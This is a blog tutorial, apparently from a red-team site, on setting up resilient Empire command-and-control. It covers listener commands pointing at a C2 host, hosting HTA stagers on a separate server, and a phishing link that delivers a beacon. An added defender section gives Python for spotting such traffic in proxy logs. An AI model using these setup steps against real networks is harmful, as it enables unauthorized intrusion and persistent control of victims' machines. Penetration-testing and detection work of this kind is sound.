Rome Didn’t Fall in a Day: Building A Resilient Empire C2, Part Two

[Originally posted on ImplicitDeny] – This write-up is for Empire 1.5, but the same concepts and commands apply.

In Part One we went over the reasons for having a resilient C2 infrastructure, and what it should look like. In summary, we want to have two or more internet-accessible servers to host the different stages and classes of our Command and Control (C2): one host to store our short launcher scripts and files, and one or more hosts to act as C2. More control hosts add resiliency and enable long-term control. The reason for this is primarily evasion of an active blue team.

Assumptions: You know how to move around in Linux on the CLI and move files from one server to another via SCP or SFTP.

Let’s get started.

Log in to your C2 server’s CLI and start Empire:

$ cd Empire/
$ sudo ./empire

Empire needs to be run as a superuser in order to bind to port 443.

With Empire up and running we need to configure a listener. For my engagements I like to configure a kill date in case something goes awry and the agent is unable to receive a manual kill command. This is good tradecraft.

(Empire) listeners
(Empire) set Name primaryC2
(Empire) set KillDate 06/12/2017
(Empire) set CertPath /home/user/Empire/data/empire.pem
(Empire) set Host https://commandcontrol1.com
(Empire) info
(Empire) execute

Use “info” to verify your settings, and then “execute” to start the listener.

Now that our listener is set up, it’s time to create some stagers.

We have dll, ducky, hop_php, hta, launcher, launcher_bat, launcher_vbs, macro, pth_wmis, stager, and war as our options. The Empire 2.0 branch also has a stager for the Regsvr32 .sct “hack” (via @subtee for this badass find), a personal favorite of mine.

For this demonstration we will be using the hta launcher as an example. Here’s a great write-up on how you would expand this to a phishing campaign.

Once you’ve configured all of your stagers we need to move some (or all) to our web host. I chose to tar-zip the files and scp them. This is done from either a different screen/tmux window, or another login shell.

$ tar -zcvf ../stagers/stagers.tgz .

Then copy the stagers.tgz to the webroot of your web server or a sub-folder if you choose.

Make sure you chown those files to www-data or that they are readable by www-data. Hosting your stagers here gives you access to them from potentially any asset in the client network (assuming non-whitelisted policies). It also gives you a separate location for your C2 should incident responders discover any of your initial stagers and the URL they are being pulled from. This would be critical if your phishing campaign was discovered and the initial web server blocked.

The attack setup looks something like this:

[Image: diagram of the attack setup]

Once you get a victim to click on http://totallynotphish.com/spreadsheet.hta and they click through the warning you’ll receive your beacon from Empire:

[Screenshot: beacon]
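
From the defender's side, the split between the launcher host and the C2 host described above means that blocking the .hta URL alone does not cut the agent's channel. This added example (not from the original post) correlates proxy log lines to find clients that fetched an .hta and then repeatedly contacted a different host; the log format, hostnames and thresholds are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log lines (timestamp, client, method, URL); not real traffic.
SAMPLE_LOG = """\
2017-05-01T09:00:00 10.0.0.5 GET http://stager-host.example/spreadsheet.hta
2017-05-01T09:00:07 10.0.0.5 CONNECT https://c2-host.example:443
2017-05-01T09:00:12 10.0.0.5 CONNECT https://c2-host.example:443
2017-05-01T09:00:17 10.0.0.5 CONNECT https://c2-host.example:443
2017-05-01T09:00:22 10.0.0.5 CONNECT https://c2-host.example:443
2017-05-01T09:01:00 10.0.0.5 GET http://intranet.example/index.html
2017-05-01T09:02:00 10.0.0.9 GET http://news.example/story.html
2017-05-01T09:02:30 10.0.0.9 CONNECT https://mail.example:443
"""


def parse(log_text):
    """Yield (time, client, host, path) for each non-empty log line."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split()
        parts = urlsplit(url)
        yield datetime.fromisoformat(ts), client, parts.hostname, parts.path.lower()


def find_post_hta_hosts(log_text, window=timedelta(minutes=10), min_hits=3):
    """Return (client, hta_host, other_host) tuples where a client fetched an
    .hta and then hit a different host at least min_hits times within window."""
    hta_seen = {}            # client -> (time, host) of its latest .hta fetch
    hits = defaultdict(int)  # (client, hta_host, other_host) -> request count
    for ts, client, host, path in parse(log_text):  # assumes time-ordered log
        if path.endswith(".hta"):
            hta_seen[client] = (ts, host)
        elif client in hta_seen:
            hta_ts, hta_host = hta_seen[client]
            if host != hta_host and ts - hta_ts <= window:
                hits[(client, hta_host, host)] += 1
    return sorted(key for key, count in hits.items() if count >= min_hits)


if __name__ == "__main__":
    for client, hta_host, other in find_post_hta_hosts(SAMPLE_LOG):
        print(f"{client}: .hta from {hta_host}, then repeated traffic to {other}")
```

Any host this reports is a candidate for blocking and hunting alongside the .hta URL itself, since the two sit on separate servers in the setup described here.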

In a follow-up post I’ll explain how to add a third server to this setup, with a bonus of passing yourself a meterpreter shell.